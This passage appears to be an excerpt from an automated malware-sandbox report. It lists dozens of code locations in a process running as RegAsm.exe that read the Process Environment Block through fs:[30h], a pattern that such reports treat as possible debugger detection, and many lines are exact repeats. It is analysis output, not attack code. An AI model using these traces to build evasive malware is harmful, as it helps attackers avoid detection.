Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8208A mov eax, dword ptr fs:[00000030h]	3_2_02C8208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D08D mov eax, dword ptr fs:[00000030h]	3_2_02C7D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB909C mov eax, dword ptr fs:[00000030h]	3_2_02CB909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD090 mov eax, dword ptr fs:[00000030h]	3_2_02CAD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD090 mov eax, dword ptr fs:[00000030h]	3_2_02CAD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85096 mov eax, dword ptr fs:[00000030h]	3_2_02C85096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D460B8 mov eax, dword ptr fs:[00000030h]	3_2_02D460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D460B8 mov ecx, dword ptr fs:[00000030h]	3_2_02D460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2705E mov ebx, dword ptr fs:[00000030h]	3_2_02D2705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2705E mov eax, dword ptr fs:[00000030h]	3_2_02D2705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C82050 mov eax, dword ptr fs:[00000030h]	3_2_02C82050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB052 mov eax, dword ptr fs:[00000030h]	3_2_02CAB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55060 mov eax, dword ptr fs:[00000030h]	3_2_02D55060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov ecx, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAC073 mov eax, dword ptr fs:[00000030h]	3_2_02CAC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD070 mov ecx, dword ptr fs:[00000030h]	3_2_02CFD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A020 mov eax, dword ptr fs:[00000030h]	3_2_02C7A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C020 mov eax, dword ptr fs:[00000030h]	3_2_02C7C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D461C3 mov eax, dword ptr fs:[00000030h]	3_2_02D461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D461C3 mov eax, dword ptr fs:[00000030h]	3_2_02D461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBD1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CBD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBD1D0 mov ecx, dword ptr fs:[00000030h]	3_2_02CBD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D551CB mov eax, dword ptr fs:[00000030h]	3_2_02D551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C851ED mov eax, dword ptr fs:[00000030h]	3_2_02C851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D561E5 mov eax, dword ptr fs:[00000030h]	3_2_02D561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB01F8 mov eax, dword ptr fs:[00000030h]	3_2_02CB01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC0185 mov eax, dword ptr fs:[00000030h]	3_2_02CC0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C188 mov eax, dword ptr fs:[00000030h]	3_2_02D3C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C188 mov eax, dword ptr fs:[00000030h]	3_2_02D3C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD7190 mov eax, dword ptr fs:[00000030h]	3_2_02CD7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9B1B0 mov eax, dword ptr fs:[00000030h]	3_2_02C9B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55152 mov eax, dword ptr fs:[00000030h]	3_2_02D55152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C156 mov eax, dword ptr fs:[00000030h]	3_2_02C7C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov ecx, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87152 mov eax, dword ptr fs:[00000030h]	3_2_02C87152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86154 mov eax, dword ptr fs:[00000030h]	3_2_02C86154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86154 mov eax, dword ptr fs:[00000030h]	3_2_02C86154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D19179 mov eax, dword ptr fs:[00000030h]	3_2_02D19179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D40115 mov eax, dword ptr fs:[00000030h]	3_2_02D40115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov ecx, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0124 mov eax, dword ptr fs:[00000030h]	3_2_02CB0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81131 mov eax, dword ptr fs:[00000030h]	3_2_02C81131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81131 mov eax, dword ptr fs:[00000030h]	3_2_02C81131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB16CF mov eax, dword ptr fs:[00000030h]	3_2_02CB16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8B6C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA6C7 mov ebx, dword ptr fs:[00000030h]	3_2_02CBA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA6C7 mov eax, dword ptr fs:[00000030h]	3_2_02CBA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F6C7 mov eax, dword ptr fs:[00000030h]	3_2_02D3F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC mov eax, dword ptr fs:[00000030h]	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D006F1 mov eax, dword ptr fs:[00000030h]	3_2_02D006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D006F1 mov eax, dword ptr fs:[00000030h]	3_2_02D006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3D6F0 mov eax, dword ptr fs:[00000030h]	3_2_02D3D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB36EF mov eax, dword ptr fs:[00000030h]	3_2_02CB36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD6E0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD6E0 mov eax, dword ptr fs:[00000030h]	3_2_02CAD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE6F2 mov eax, dword ptr fs:[00000030h]	3_2_02CFE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D136EE mov eax, dword ptr fs:[00000030h]	3_2_02D136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84690 mov eax, dword ptr fs:[00000030h]	3_2_02C84690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84690 mov eax, dword ptr fs:[00000030h]	3_2_02C84690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0368C mov eax, dword ptr fs:[00000030h]	3_2_02D0368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D6AA mov eax, dword ptr fs:[00000030h]	3_2_02C7D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D6AA mov eax, dword ptr fs:[00000030h]	3_2_02C7D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBC6A6 mov eax, dword ptr fs:[00000030h]	3_2_02CBC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C776B2 mov eax, dword ptr fs:[00000030h]	3_2_02C776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB66B0 mov eax, dword ptr fs:[00000030h]	3_2_02CB66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9C640 mov eax, dword ptr fs:[00000030h]	3_2_02C9C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA660 mov eax, dword ptr fs:[00000030h]	3_2_02CBA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA660 mov eax, dword ptr fs:[00000030h]	3_2_02CBA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB9660 mov eax, dword ptr fs:[00000030h]	3_2_02CB9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB9660 mov eax, dword ptr fs:[00000030h]	3_2_02CB9660
